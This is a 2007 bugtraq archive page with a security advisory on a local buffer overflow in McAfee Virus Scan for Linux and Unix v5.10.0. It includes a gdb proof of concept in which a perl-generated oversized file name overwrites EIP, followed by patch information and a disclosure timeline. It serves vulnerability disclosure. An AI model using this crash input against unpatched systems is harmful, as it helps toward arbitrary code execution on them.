bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buff

McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

From: Sebastian Wolfgarten <sebastian_at_nospam>
Date: Wed Aug 15 2007 - 12:56:54 GMT
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I - TITLE Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

II - SUMMARY Description: Local buffer overflow vulnerability in McAfee Virus Scan for Linux and Unix allows arbitrary code execution

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)

Date: August 15th, 2007

Severity: Low-Medium

References: http://www.devtarget.org/mcafee-advisory-08-2007.txt

III - OVERVIEW McAfee Virus Scan for Linux and Unix is a command-line version of the popular McAfee anti-virus scanner running on the Linux operating system as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was discovered that the product is prone to a classic buffer overflow vulnerability when attempting to scan files or directories with a particularly long name. This vulnerability results in the local execution of arbitrary code with the privileges of the user running the scanner, privilege escalation is by default not possible. Remote exploitation appears to be infeasible due to file length limitations in popular file systems.

IV - DETAILS The overflow occurs when the product tries to scan a file or directory with a name that is longer than a certain size (approx. 4124+ bytes). For example on a Debian Linux 3.1 test system, it takes 4124+4 bytes to successfully overwrite the EIP register and thus execute arbitrary code:

# /usr/local/uvscan/uvscan --version
Virus Scan for Linux v5.10.0
Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
(408) 988-3832 EVALUATION COPY - May 26 2006

Scan engine v5.1.00 for Linux.
Virus data file v4777 created Jun 05 2006 Scanning for 194376 viruses, trojans and variants.

# gdb /usr/local/uvscan/uvscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found) Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 . "B"x4'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

[Thread debugging using libthread_db enabled] [New Thread 1080238208 (LWP 2461)]
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1080238208 (LWP 2461)] 0x42424242 in ?? ()
(gdb) info registers
eax 0x1 1 ecx 0x8068430 134644784 edx 0x1 1 ebx 0x41414141 1094795585 esp 0xbfffdc40 0xbfffdc40 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x42424242 0x42424242 eflags 0x282 642 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51

V - EXPLOIT CODE An exploit for this vulnerability has been developed but will not released to the general public at this time.

VI - WORKAROUND/FIX To address this problem, the vendor has released McAfee VirusScan Command Line Scanner for Linux and Unix version 5.20. Thus all users of the product are asked to test and install this patch as soon as possible. McAfee has also published a dedicated security bulletin that covers the problem (see
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576).

VII - DISCLOSURE TIMELINE

  1. December 2006 - Notified security@mcafee.com
  2. December 2006 - Vendor responded that vulnerability is being investigated
  3. December to 15. August 2007 - Weekly vendor report on the progress of the development of the patch
  4. August 2007 - Release of patch
  5. August 2007 - Public disclosure

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwvgWd8QFWG1Rza8RAjyeAKC6zp+l6CwLw6/eQ80c6CDue4DpUwCdHtS9 pUdSpbqcZz1QkpM/YDc0dN4=
=PUZy
-----END PGP SIGNATURE-----